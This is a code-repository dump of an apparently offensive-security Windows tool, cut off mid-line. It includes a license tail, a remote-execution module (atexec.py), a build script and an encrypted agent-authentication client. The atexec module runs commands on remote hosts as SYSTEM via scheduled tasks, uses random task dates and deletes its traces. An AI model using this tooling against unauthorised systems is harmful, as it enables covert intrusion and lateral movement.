reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. 
You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 
202 | -------------------------------------------------------------------------------- /src/slingerpkg/lib/atexec.py: -------------------------------------------------------------------------------- 1 | import ntpath 2 | from time import sleep 3 | from slingerpkg.utils.printlib import * 4 | from slingerpkg.lib.dcetransport import * 5 | from slingerpkg.utils.common import enum_struct, generate_random_date, validate_xml, xml_escape 6 | from tabulate import tabulate 7 | import os 8 | import traceback 9 | 10 | 11 | class atexec: 12 | def __init__(self): 13 | print_debug("ATExec Module Loaded!") 14 | 15 | def _cmd_split(self, cmdline): 16 | cmdline = cmdline.split(" ", 1) 17 | cmd = cmdline[0] 18 | args = cmdline[1] if len(cmdline) > 1 else "" 19 | 20 | return [cmd, args] 21 | 22 | def _create_task(self, args): 23 | # Connection should already be established by caller 24 | # Don't call setup_dce_transport() or _connect() here 25 | 26 | cmd = "cmd.exe" 27 | # arguments = "/C %s > %%windir%%\\Temp\\%s 2>&1" % (self.__command, tmpFileName) 28 | share_path = args.share_path 29 | # remove trailing backslash 30 | share_path = share_path.rstrip("\\") 31 | cmd = "cmd.exe" 32 | if not args.sn: 33 | random_save_name = generate_random_string(8, 10) + ".txt" 34 | else: 35 | random_save_name = args.sn 36 | # save_file_path = args.path + f"{share_path}\\{random_save_name}" 37 | save_file_path = ntpath.join(share_path, random_save_name) 38 | arguments = f"/C {args.command} > {save_file_path} 2>&1" 39 | timestamp = generate_random_date() 40 | xml_escaped_args = xml_escape(arguments) 41 | xml = f""" 42 | 43 | 44 | {xml_escape(args.ta)} 45 | {xml_escape(args.td)} 46 | \\{xml_escape(args.tn)} 47 | 48 | 49 | 50 | {timestamp} 51 | true 52 | 53 | 1 54 | 55 | 56 | 57 | 58 | 59 | S-1-5-18 60 | HighestAvailable 61 | 62 | 63 | 64 | IgnoreNew 65 | false 66 | false 67 | true 68 | false 69 | 70 | true 71 | false 72 | 73 | true 74 | true 75 | true 76 | false 77 | false 78 | P3D 79 | 7 80 | 81 | 82 | 83 | {xml_escape(cmd)} 84 | {xml_escaped_args} 85 | 86 | 87 | 88 | """ 89 | print_debug(f"Task '{args.tn}' will save output to: {save_file_path}") 90 | resp = self.dce_transport._create_task(args.tn, args.tf, xml) 91 | return resp, random_save_name 92 | 93 | def atexec(self, args): 94 | 95 | task_name = args.tn 96 | task_author = args.ta 97 | task_description = args.td 98 | task_command = args.command 99 | task_folder = args.tf 100 | 101 | # get a list of shares 102 | share_info_dict = self.list_shares(args=None, echo=False, ret=True) 103 | # print(share_info_dict) 104 | share_exists = False 105 | if share_info_dict is None or len(share_info_dict) == 0: 106 | print_bad("Failed to list shares") 107 | return 108 | # check if the share exists 109 | for share_info in share_info_dict: 110 | if share_info["name"] == (args.sh).upper(): 111 | share_exists = True 112 | # Ensure proper path construction with backslashes 113 | share_root = share_info["path"].rstrip("\\") # Remove trailing backslash 114 | user_path = args.sp.lstrip("\\").rstrip( 115 | "\\" 116 | ) # Remove only leading/trailing backslashes 117 | args.share_path = f"{share_root}\\{user_path}" 118 | print_debug(f"Using share path: {args.share_path}") 119 | break 120 | 121 | if not share_exists: 122 | print_bad(f"Share '{args.sh}' does not exist") 123 | return 124 | 125 | # Connect to the pipe 126 | self.setup_dce_transport() 127 | self.dce_transport._connect("atsvc") 128 | 129 | # Create the task 130 | save_file_name = None 131 | try: 132 | response, save_file_name = 
self._create_task(args) 133 | if response["ErrorCode"] == 0: 134 | print_good(f"Task '{args.tn}' created successfully") 135 | else: 136 | print_bad(f"Failed to create task '{args.tn}'") 137 | return 138 | except Exception as e: 139 | print_debug(f"Exception: {e}", sys.exc_info()) 140 | if "ERROR_ALREADY_EXISTS" in str(e): 141 | print_warning(f"Task file '{args.tn}' already exists, please delete it first") 142 | return 143 | 144 | # Reconnect to the pipe 145 | self.dce_transport._connect("atsvc") 146 | 147 | # Run the task 148 | try: 149 | full_task_path = ntpath.join(task_folder, task_name) 150 | response = self.dce_transport._run_task(full_task_path) 151 | if response["ErrorCode"] == 0: 152 | print_good(f"Task '{full_task_path}' executed successfully") 153 | else: 154 | print_bad(f"Failed to execute task '{full_task_path}'") 155 | return 156 | except Exception as e: 157 | print_debug(f"Exception during task run: {e}", sys.exc_info()) 158 | return 159 | 160 | # Reconnect to the pipe 161 | self.dce_transport._connect("atsvc") 162 | 163 | # Delete the task 164 | try: 165 | response = self.dce_transport._delete_task(full_task_path) 166 | if response["ErrorCode"] == 0: 167 | print_good(f"Task '{args.tn}' deleted successfully") 168 | else: 169 | print_bad(f"Failed to delete task '{args.tn}'") 170 | return 171 | except Exception as e: 172 | print_debug(f"Exception: {e}", sys.exc_info()) 173 | return 174 | 175 | # Retrieve the output 176 | try: 177 | # Create relative path from share root (no leading backslashes) 178 | # Ensure proper path construction with backslashes 179 | relative_path = args.sp.lstrip("\\").rstrip( 180 | "\\" 181 | ) # Remove only leading/trailing backslashes 182 | args.remote_path = f"{relative_path}\\{save_file_name}" 183 | # Ensure we're connected to the share for file operations 184 | print_debug(f"Current share: {getattr(self, 'share', 'None')}, needed: {args.sh}") 185 | if not hasattr(self, "share") or self.share != args.sh: 186 | print_debug(f"Connecting to share: {args.sh}") 187 | self.connect_share(args) 188 | else: 189 | print_debug(f"Already on correct share: {self.share}") 190 | print_debug(f"Retrieving output from: {args.remote_path}") 191 | sleep(args.wait) 192 | print_info(f"Command output:") 193 | self.cat(args, echo=False) # Show the output content without download progress 194 | self.delete(args.remote_path) 195 | except Exception as e: 196 | print_debug(f"Exception: {e}", sys.exc_info()) 197 | return 198 | 199 | def atexec_handler(self, args): 200 | # Check if connected to a share (same pattern as other SMB commands) 201 | if not self.check_if_connected(): 202 | return 203 | 204 | # Generate default task name if not provided 205 | if args.tn is None: 206 | from slingerpkg.utils.common import generate_random_string 207 | 208 | args.tn = f"SlingerTask_{generate_random_string(6, 8)}" 209 | 210 | # Update share to match currently connected share 211 | if hasattr(self, "share") and self.share: 212 | args.sh = self.share 213 | 214 | # Adjust default path based on share type 215 | if args.sp == "\\Users\\Public\\Downloads\\" and args.sh.upper() == "ADMIN$": 216 | args.sp = "\\Temp\\" 217 | print_debug(f"Using ADMIN$ appropriate path: {args.sp}") 218 | 219 | cmd = None 220 | # handle mistakes in which the user specifies a full path 221 | if ":" in args.sp: 222 | print_bad("Invalid path name, please use a relative path") 223 | return 224 | if args.shell: 225 | print_warning( 226 | "Entering semi-interactive mode. Type 'exit' to return to the main menu." 
227 | ) 228 | print_info("Tip: Type 'config' to view current atexec configuration") 229 | while cmd != "exit": 230 | print_debug("Type 'config' to view current settings") 231 | cmd = input("atexec> ") 232 | if cmd == "exit": 233 | break 234 | elif cmd == "config": 235 | # Display current atexec configuration 236 | print_info("Current atexec configuration:") 237 | print_info(f" Task Name (-tn): {args.tn}") 238 | print_info(f" Share (-sh): {args.sh}") 239 | print_info(f" Path (-sp): {args.sp}") 240 | print_info(f" Author (-ta): {args.ta}") 241 | print_info(f" Description (-td): {args.td}") 242 | print_info(f" Folder (-tf): {args.tf}") 243 | print_info(f" Wait Time (-w): {args.wait}s") 244 | print_info(f" Save Name (-sn): {args.sn}") 245 | print() 246 | continue 247 | 248 | # Create a shallow copy of args to avoid state pollution between commands 249 | # Note: Cannot use deepcopy due to socket objects in args 250 | import copy 251 | 252 | shell_args = copy.copy(args) 253 | shell_args.command = cmd 254 | 255 | # Generate a unique task name for each shell command 256 | from slingerpkg.utils.common import generate_random_string 257 | 258 | shell_args.tn = f"SlingerTask_{generate_random_string(6, 8)}" 259 | 260 | # Display arguments for user reference 261 | print_info(f"Executing with arguments:") 262 | print_info(f" Command: {shell_args.command}") 263 | print_info(f" Task Name: {shell_args.tn}") 264 | print_info(f" Share: {shell_args.sh}") 265 | print_info(f" Path: {shell_args.sp}") 266 | print_info(f" Author: {shell_args.ta}") 267 | print_info(f" Wait Time: {shell_args.wait}s") 268 | print() 269 | 270 | self.atexec(shell_args) 271 | else: 272 | # handle if no command is specified 273 | if args.command is None: 274 | print_bad("No command specified") 275 | return 276 | self.atexec(args) 277 | -------------------------------------------------------------------------------- /scripts/build_script.py: -------------------------------------------------------------------------------- 1 | import argparse 2 | import re 3 | import sys 4 | import subprocess 5 | from unittest.mock import MagicMock 6 | from pathlib import Path 7 | 8 | import toml 9 | 10 | # Dynamically add the src directory to the Python path 11 | current_dir = Path(__file__).resolve().parent 12 | src_path = current_dir.parent / "src" 13 | sys.path.insert(0, str(src_path)) 14 | 15 | from slingerpkg.utils.cli import setup_cli_parser 16 | 17 | 18 | def parse_requirements(filename): 19 | try: 20 | with open(filename, "r") as file: 21 | return [line.strip() for line in file.readlines() if line.strip()] 22 | except FileNotFoundError: 23 | print(f"File {filename} not found. 
Skipping requirements parsing.") 24 | return [] 25 | 26 | 27 | def extract_commands_and_args(parser): 28 | commands = {} 29 | for action in parser._actions: 30 | if isinstance(action, argparse._SubParsersAction): 31 | for command, subparser in action.choices.items(): 32 | usage = subparser.format_usage() if hasattr(subparser, "format_usage") else "" 33 | usage = usage.replace("usage: slinger ", "").strip() 34 | desc = getattr(subparser, "description", "No description provided") 35 | help_text = f"{usage}\n{desc}" if usage else desc 36 | 37 | commands[command] = { 38 | "description": desc, 39 | "help": help_text, 40 | "epilog": getattr(subparser, "epilog", None), 41 | "arguments": [], 42 | "subcommands": {}, 43 | } 44 | 45 | # Extract regular arguments 46 | for sub_action in subparser._actions: 47 | if isinstance(sub_action, argparse._StoreAction): 48 | commands[command]["arguments"].append( 49 | { 50 | "name": sub_action.dest, 51 | "help": sub_action.help, 52 | "choices": sub_action.choices, 53 | "default": sub_action.default, 54 | "required": ( 55 | sub_action.required 56 | if hasattr(sub_action, "required") 57 | else False 58 | ), 59 | } 60 | ) 61 | # Extract nested subparsers (like wmiexec query, eventlog query, etc.) 62 | elif isinstance(sub_action, argparse._SubParsersAction): 63 | for subcommand, sub_subparser in sub_action.choices.items(): 64 | sub_usage = ( 65 | sub_subparser.format_usage() 66 | if hasattr(sub_subparser, "format_usage") 67 | else "" 68 | ) 69 | sub_usage = sub_usage.replace("usage: slinger ", "").strip() 70 | sub_desc = getattr( 71 | sub_subparser, "description", "No description provided" 72 | ) 73 | sub_help_text = f"{sub_usage}\n{sub_desc}" if sub_usage else sub_desc 74 | 75 | commands[command]["subcommands"][subcommand] = { 76 | "description": sub_desc, 77 | "help": sub_help_text, 78 | "epilog": getattr(sub_subparser, "epilog", None), 79 | "arguments": [], 80 | } 81 | 82 | # Extract arguments for the nested subcommand 83 | for sub_sub_action in sub_subparser._actions: 84 | if isinstance(sub_sub_action, argparse._StoreAction): 85 | commands[command]["subcommands"][subcommand][ 86 | "arguments" 87 | ].append( 88 | { 89 | "name": sub_sub_action.dest, 90 | "help": sub_sub_action.help, 91 | "choices": sub_sub_action.choices, 92 | "default": sub_sub_action.default, 93 | "required": ( 94 | sub_sub_action.required 95 | if hasattr(sub_sub_action, "required") 96 | else False 97 | ), 98 | } 99 | ) 100 | return commands 101 | 102 | 103 | def generate_markdown(commands, output_file): 104 | with open(output_file, "w") as md_file: 105 | md_file.write("# CLI Commands Documentation\n\n") 106 | for command, details in commands.items(): 107 | md_file.write(f"## `{command}`\n\n") 108 | md_file.write(f"**Description:** {details['description']}\n\n") 109 | md_file.write(f"**Help:**\n```\n{details['help']}\n```\n\n") 110 | if details["epilog"]: 111 | md_file.write(f"**Example Usage:**\n```\n{details['epilog']}\n```\n\n") 112 | if details["arguments"]: 113 | md_file.write("### Arguments\n\n") 114 | for arg in details["arguments"]: 115 | md_file.write( 116 | f"- **`{arg['name']}`**: {arg['help'] or 'No description provided'}\n".replace( 117 | "(default: %(default)s)", "" 118 | ) 119 | ) 120 | if arg["choices"]: 121 | md_file.write(f" - Choices: {', '.join(arg['choices'])}\n") 122 | if arg["default"] is not None: 123 | md_file.write(f" - Default: `{arg['default']}`\n") 124 | required_text = "Yes" if arg["required"] else "No" 125 | md_file.write(f" - Required: {required_text}\n\n") 126 | 
127 | # Handle nested subcommands (like wmiexec query, eventlog query) 128 | if details.get("subcommands"): 129 | md_file.write("### Subcommands\n\n") 130 | for subcommand, sub_details in details["subcommands"].items(): 131 | md_file.write(f"#### `{command} {subcommand}`\n\n") 132 | md_file.write(f"**Description:** {sub_details['description']}\n\n") 133 | md_file.write(f"**Help:**\n```\n{sub_details['help']}\n```\n\n") 134 | if sub_details["epilog"]: 135 | md_file.write(f"**Example Usage:**\n```\n{sub_details['epilog']}\n```\n\n") 136 | if sub_details["arguments"]: 137 | md_file.write("##### Arguments\n\n") 138 | for arg in sub_details["arguments"]: 139 | md_file.write( 140 | f"- **`{arg['name']}`**: {arg['help'] or 'No description provided'}\n".replace( 141 | "(default: %(default)s)", "" 142 | ) 143 | ) 144 | if arg["choices"]: 145 | choices_text = ", ".join(map(str, arg["choices"])) 146 | md_file.write(f" - Choices: {choices_text}\n") 147 | if arg["default"] is not None: 148 | md_file.write(f" - Default: `{arg['default']}`\n") 149 | required_text = "Yes" if arg["required"] else "No" 150 | md_file.write(f" - Required: {required_text}\n\n") 151 | md_file.write("---\n\n") 152 | else: 153 | md_file.write("---\n\n") 154 | 155 | 156 | def get_package_dir(): 157 | """Locate the main package directory dynamically.""" 158 | src_path = Path(__file__).resolve().parent.parent / "src" 159 | for package_dir in src_path.iterdir(): 160 | if package_dir.is_dir() and (package_dir / "__init__.py").exists(): 161 | return package_dir 162 | raise FileNotFoundError("Could not locate the main package directory containing __init__.py") 163 | 164 | 165 | def get_version_from_init(package_dir): 166 | """Extract the version from the top-level __init__.py file.""" 167 | init_file = package_dir / "__init__.py" 168 | version_pattern = r"^__version__\s*=\s*['\"]([^'\"]+)['\"]" 169 | with open(init_file, "r") as f: 170 | for line in f: 171 | match = re.match(version_pattern, line) 172 | if match: 173 | return match.group(1) 174 | raise ValueError("Version not found in __init__.py") 175 | 176 | 177 | def update_version_in_pyproject(pyproject_file, new_version): 178 | """Update the version in pyproject.toml.""" 179 | pyproject_data = toml.load(pyproject_file) 180 | if "project" in pyproject_data and "version" in pyproject_data["project"]: 181 | pyproject_data["project"]["version"] = new_version 182 | with open(pyproject_file, "w") as f: 183 | toml.dump(pyproject_data, f) 184 | print(f"Updated version in {pyproject_file} to {new_version}") 185 | 186 | 187 | def run_build(): 188 | """Run the Python build process.""" 189 | try: 190 | # Ensure `build` is installed 191 | subprocess.run(["pip", "install", "--upgrade", "build"], check=True) 192 | 193 | # Run the build command 194 | subprocess.run(["python", "-m", "build"], check=True) 195 | print("Build completed successfully!") 196 | except subprocess.CalledProcessError as e: 197 | print(f"Build failed: {e}") 198 | except FileNotFoundError: 199 | print("Ensure that Python and the `build` module are installed.") 200 | 201 | 202 | def generate_help_markdown(): 203 | # Create a mock slingerClient 204 | mock_client = MagicMock() 205 | 206 | # Set up the parser using the mock client 207 | parser = setup_cli_parser(mock_client) 208 | 209 | # Extract commands and arguments 210 | commands = extract_commands_and_args(parser) 211 | 212 | # Generate the markdown file in docs/ directory 213 | docs_dir = Path(__file__).resolve().parent.parent / "docs" 214 | docs_dir.mkdir(exist_ok=True) # 
Ensure docs directory exists 215 | output_file = docs_dir / "cli_menu.md" 216 | generate_markdown(commands, output_file) 217 | print(f"Markdown documentation generated: {output_file}") 218 | 219 | 220 | def update_dependencies(): 221 | # Parse requirements 222 | dependencies = parse_requirements("requirements.txt") 223 | if dependencies: 224 | print("Dependencies:", dependencies) 225 | else: 226 | print("No dependencies found.") 227 | 228 | # Update dependencies in pyproject.toml 229 | pyproject_file = current_dir.parent / "pyproject.toml" 230 | pyproject_data = toml.load(pyproject_file) 231 | 232 | # Update dependencies 233 | pyproject_data["project"]["dependencies"] = dependencies 234 | with open(pyproject_file, "w") as f: 235 | toml.dump(pyproject_data, f) 236 | print(f"Updated dependencies in {pyproject_file}") 237 | 238 | 239 | def main(): 240 | # Locate necessary files 241 | current_dir = Path(__file__).resolve().parent 242 | pyproject_file = current_dir.parent / "pyproject.toml" 243 | package_dir = get_package_dir() 244 | 245 | # Get version from __init__.py 246 | init_version = get_version_from_init(package_dir) 247 | print(f"Current version in __init__.py: {init_version}") 248 | 249 | # Get version from pyproject.toml 250 | pyproject_data = toml.load(pyproject_file) 251 | pyproject_version = pyproject_data.get("project", {}).get("version") 252 | print(f"Current version in pyproject.toml: {pyproject_version}") 253 | 254 | # Update pyproject.toml if versions do not match 255 | if pyproject_version != init_version: 256 | update_version_in_pyproject(pyproject_file, init_version) 257 | 258 | # Run the build process 259 | generate_help_markdown() 260 | update_dependencies() 261 | run_build() 262 | 263 | 264 | if __name__ == "__main__": 265 | main() 266 | -------------------------------------------------------------------------------- /src/slingerpkg/lib/agent_crypto.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | """ 3 | Client-side cryptographic authentication for Slinger agents. 4 | 5 | Implements a simplified challenge-response authentication protocol: 6 | 7 | 1. Agent sends 16-byte random nonce 8 | 2. Client responds with HMAC-SHA256(passphrase, nonce) + encrypted command 9 | 3. Agent verifies HMAC and derives session key from nonce+passphrase 10 | 4. All future messages encrypted with session-specific AES-256-GCM key 11 | 12 | Security properties: 13 | - Requires attacker to have: network capture, agent binary, and active participation 14 | - Replay attacks prevented by random nonce per session 15 | - Forward secrecy through session-specific keys 16 | - No plaintext passphrase in agent (only SHA256 hash) 17 | """ 18 | 19 | import os 20 | import hmac 21 | import hashlib 22 | from typing import Tuple, Optional 23 | from cryptography.hazmat.primitives.ciphers.aead import AESGCM 24 | from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC 25 | from cryptography.hazmat.primitives import hashes 26 | from cryptography.hazmat.backends import default_backend 27 | 28 | 29 | class AgentAuthProtocol: 30 | """ 31 | Simplified challenge-response authentication for Slinger agents. 32 | 33 | Protocol flow: 34 | 1. Client receives 16-byte nonce from agent 35 | 2. Client computes HMAC-SHA256(passphrase, nonce) as authentication proof 36 | 3. Client derives session key using PBKDF2-HMAC-SHA256(passphrase, nonce, 10k iterations) 37 | 4. 
All messages encrypted with AES-256-GCM using session key 38 | 39 | Message format: [12-byte IV][ciphertext][16-byte auth tag] 40 | """ 41 | 42 | # Protocol constants 43 | NONCE_SIZE = 16 # bytes 44 | HMAC_SIZE = 32 # bytes (SHA-256) 45 | IV_SIZE = 12 # bytes (GCM standard) 46 | TAG_SIZE = 16 # bytes (GCM standard) 47 | PBKDF2_ITERATIONS = 10000 48 | SESSION_KEY_SIZE = 32 # bytes (AES-256) 49 | 50 | def __init__(self): 51 | """Initialize authentication protocol handler.""" 52 | self.session_key: Optional[bytes] = None 53 | self.authenticated = False 54 | 55 | def handle_challenge(self, nonce: bytes, passphrase: str) -> Tuple[bytes, bytes]: 56 | """ 57 | Handle agent's challenge and prepare authentication response. 58 | 59 | This method: 60 | 1. Computes HMAC-SHA256(passphrase, nonce) for authentication 61 | 2. Derives session key using PBKDF2-HMAC-SHA256 62 | 63 | Args: 64 | nonce: 16-byte random challenge from agent 65 | passphrase: User's passphrase (same one hashed in agent binary) 66 | 67 | Returns: 68 | Tuple of (hmac_response, session_key): 69 | - hmac_response: 32-byte HMAC to prove knowledge of passphrase 70 | - session_key: 32-byte derived key for encrypting future messages 71 | 72 | Raises: 73 | ValueError: If nonce size is incorrect 74 | """ 75 | if len(nonce) != self.NONCE_SIZE: 76 | raise ValueError(f"Invalid nonce size: {len(nonce)} (expected {self.NONCE_SIZE})") 77 | 78 | # Compute HMAC-SHA256(SHA256(passphrase), nonce) for authentication 79 | # Must match agent's auth_protocol.h which uses passphrase_hash 80 | passphrase_bytes = passphrase.encode("utf-8") 81 | passphrase_hash = hashlib.sha256(passphrase_bytes).digest() 82 | hmac_response = hmac.new(key=passphrase_hash, msg=nonce, digestmod=hashlib.sha256).digest() 83 | 84 | # Derive session key using PBKDF2-HMAC-SHA256 85 | session_key = self.derive_session_key(passphrase, nonce) 86 | 87 | return hmac_response, session_key 88 | 89 | def derive_session_key(self, passphrase: str, nonce: bytes) -> bytes: 90 | """ 91 | Derive session-specific encryption key using PBKDF2-HMAC-SHA256. 92 | 93 | Uses SHA256(passphrase) as the password and nonce as salt. 94 | This matches the C++ agent implementation in auth_protocol.h. 95 | 96 | Args: 97 | passphrase: User's passphrase 98 | nonce: 16-byte random nonce used as salt 99 | 100 | Returns: 101 | 32-byte session key for AES-256-GCM encryption 102 | """ 103 | # Hash the passphrase first to match C++ agent 104 | passphrase_bytes = passphrase.encode("utf-8") 105 | passphrase_hash = hashlib.sha256(passphrase_bytes).digest() 106 | 107 | kdf = PBKDF2HMAC( 108 | algorithm=hashes.SHA256(), 109 | length=self.SESSION_KEY_SIZE, 110 | salt=nonce, 111 | iterations=self.PBKDF2_ITERATIONS, 112 | backend=default_backend(), 113 | ) 114 | return kdf.derive(passphrase_hash) 115 | 116 | def initialize_session(self, session_key: bytes) -> bool: 117 | """ 118 | Initialize the session with a derived session key. 119 | 120 | After calling handle_challenge(), use this method to store the 121 | session key and mark the protocol as authenticated. 
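        Example (illustrative sketch only; variable names are hypothetical,
        `nonce` is the 16-byte challenge received from the agent):

            proto = AgentAuthProtocol()
            hmac_response, session_key = proto.handle_challenge(nonce, passphrase)
            proto.initialize_session(session_key)
            # hmac_response is returned to the agent as proof of the passphrase;
            # encrypt_message()/decrypt_message() may then be used for traffic.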
122 | 123 | Args: 124 | session_key: 32-byte session key from handle_challenge() 125 | 126 | Returns: 127 | True if initialization successful, False otherwise 128 | """ 129 | try: 130 | if len(session_key) != self.SESSION_KEY_SIZE: 131 | raise ValueError(f"Invalid session key size: {len(session_key)}") 132 | 133 | self.session_key = session_key 134 | self.authenticated = True 135 | return True 136 | except Exception as e: 137 | print(f"Error initializing session: {e}") 138 | return False 139 | 140 | def encrypt_message(self, plaintext: str) -> Optional[str]: 141 | """ 142 | Encrypt message with AES-256-GCM using session key. 143 | 144 | Message format: ENCRYPTED|iv_hex|tag_hex|ciphertext_hex 145 | 146 | The AESGCM.encrypt() method returns [ciphertext || tag], where: 147 | - ciphertext: encrypted data 148 | - tag: 16-byte authentication tag 149 | 150 | Args: 151 | plaintext: Message to encrypt 152 | 153 | Returns: 154 | Formatted encrypted message string, or None on error 155 | """ 156 | if not self.authenticated or not self.session_key: 157 | print("Error: Cannot encrypt - not authenticated") 158 | return None 159 | 160 | try: 161 | # Generate random 12-byte IV for GCM 162 | iv = os.urandom(self.IV_SIZE) 163 | 164 | # Encrypt with AES-256-GCM 165 | aesgcm = AESGCM(self.session_key) 166 | plaintext_bytes = plaintext.encode("utf-8") 167 | 168 | # Encrypt returns: ciphertext || 16-byte authentication tag 169 | ciphertext_with_tag = aesgcm.encrypt(iv, plaintext_bytes, None) 170 | 171 | # Split ciphertext and tag (last 16 bytes is tag) 172 | ciphertext = ciphertext_with_tag[: -self.TAG_SIZE] 173 | tag = ciphertext_with_tag[-self.TAG_SIZE :] 174 | 175 | # Format: ENCRYPTED|iv_hex|tag_hex|ciphertext_hex 176 | encrypted_msg = f"ENCRYPTED|{iv.hex()}|{tag.hex()}|{ciphertext.hex()}" 177 | return encrypted_msg 178 | 179 | except Exception as e: 180 | print(f"Encryption error: {e}") 181 | return None 182 | 183 | def decrypt_message(self, encrypted_msg: str) -> Optional[str]: 184 | """ 185 | Decrypt message with AES-256-GCM using session key. 
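        This is the inverse of encrypt_message(); if the IV, tag, or ciphertext has
        been altered, the GCM authentication check fails and None is returned.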
186 | 187 | Expected format: ENCRYPTED|iv_hex|tag_hex|ciphertext_hex 188 | 189 | Args: 190 | encrypted_msg: Formatted encrypted message string 191 | 192 | Returns: 193 | Decrypted plaintext string, or None on error 194 | """ 195 | if not self.authenticated or not self.session_key: 196 | print("Error: Cannot decrypt - not authenticated") 197 | return None 198 | 199 | try: 200 | # Validate format 201 | if not encrypted_msg.startswith("ENCRYPTED|"): 202 | print("Error: Invalid encrypted message format") 203 | return None 204 | 205 | parts = encrypted_msg.split("|") 206 | if len(parts) != 4: 207 | print(f"Error: Invalid encrypted message parts (expected 4, got {len(parts)})") 208 | return None 209 | 210 | # Parse components 211 | iv = bytes.fromhex(parts[1]) 212 | tag = bytes.fromhex(parts[2]) 213 | ciphertext = bytes.fromhex(parts[3]) 214 | 215 | # Validate sizes 216 | if len(iv) != self.IV_SIZE: 217 | print(f"Error: Invalid IV size (expected {self.IV_SIZE}, got {len(iv)})") 218 | return None 219 | if len(tag) != self.TAG_SIZE: 220 | print(f"Error: Invalid tag size (expected {self.TAG_SIZE}, got {len(tag)})") 221 | return None 222 | 223 | # Reconstruct ciphertext with tag for decryption 224 | ciphertext_with_tag = ciphertext + tag 225 | 226 | # Decrypt with AES-256-GCM 227 | aesgcm = AESGCM(self.session_key) 228 | plaintext_bytes = aesgcm.decrypt(iv, ciphertext_with_tag, None) 229 | 230 | return plaintext_bytes.decode("utf-8") 231 | 232 | except Exception as e: 233 | print(f"Decryption error: {e}") 234 | return None 235 | 236 | def is_authenticated(self) -> bool: 237 | """ 238 | Check if authentication handshake completed successfully. 239 | 240 | Returns: 241 | True if session is authenticated and ready for encryption 242 | """ 243 | return self.authenticated 244 | 245 | def reset(self): 246 | """ 247 | Reset the authentication state and securely clear session key. 248 | 249 | Call this when disconnecting or when authentication fails. 250 | """ 251 | if self.session_key: 252 | # Overwrite session key memory before deletion 253 | # (Note: Python's memory management makes true zeroing difficult, 254 | # but this is better than nothing) 255 | self.session_key = b"\x00" * len(self.session_key) 256 | 257 | self.session_key = None 258 | self.authenticated = False 259 | 260 | 261 | # Compatibility wrapper for existing code that uses the old interface 262 | class AgentAuthProtocolLegacy: 263 | """ 264 | Legacy compatibility wrapper for existing code. 265 | 266 | This provides backward compatibility with the old initialize_with_passphrase() 267 | interface, but uses a static agent_id as salt since we now use nonce-based 268 | session keys. 269 | """ 270 | 271 | def __init__(self): 272 | self.session_key: Optional[bytes] = None 273 | self.authenticated = False 274 | 275 | def initialize_with_passphrase(self, passphrase: str, agent_id: str) -> bool: 276 | """ 277 | Legacy method: Derive session key from passphrase using PBKDF2. 278 | 279 | Note: This is kept for backward compatibility but is less secure than 280 | the challenge-response protocol. Use AgentAuthProtocol for new code. 
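        Because the salt here is the static agent_id rather than a fresh per-session
        nonce, the derived key is identical across sessions, so there is no forward
        secrecy: recovering the passphrase (or the key) exposes traffic from every session.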
281 | 282 | Args: 283 | passphrase: User's passphrase 284 | agent_id: Agent identifier (used as PBKDF2 salt) 285 | 286 | Returns: 287 | True if key derivation successful 288 | """ 289 | try: 290 | # Use PBKDF2 to derive 256-bit AES key from passphrase 291 | kdf = PBKDF2HMAC( 292 | algorithm=hashes.SHA256(), 293 | length=32, # 256 bits for AES-256 294 | salt=agent_id.encode("utf-8"), 295 | iterations=100000, # Higher iterations for static keys 296 | backend=default_backend(), 297 | ) 298 | self.session_key = kdf.derive(passphrase.encode("utf-8")) 299 | self.authenticated = True 300 | return True 301 | except Exception as e: 302 | print(f"Error deriving session key: {e}") 303 | return False 304 | 305 | def encrypt_message(self, plaintext: str) -> Optional[str]: 306 | """Encrypt message - same as AgentAuthProtocol.""" 307 | if not self.authenticated or not self.session_key: 308 | return None 309 | 310 | try: 311 | aesgcm = AESGCM(self.session_key) 312 | iv = os.urandom(12) 313 | plaintext_bytes = plaintext.encode("utf-8") 314 | ciphertext_with_tag = aesgcm.encrypt(iv, plaintext_bytes, None) 315 | ciphertext = 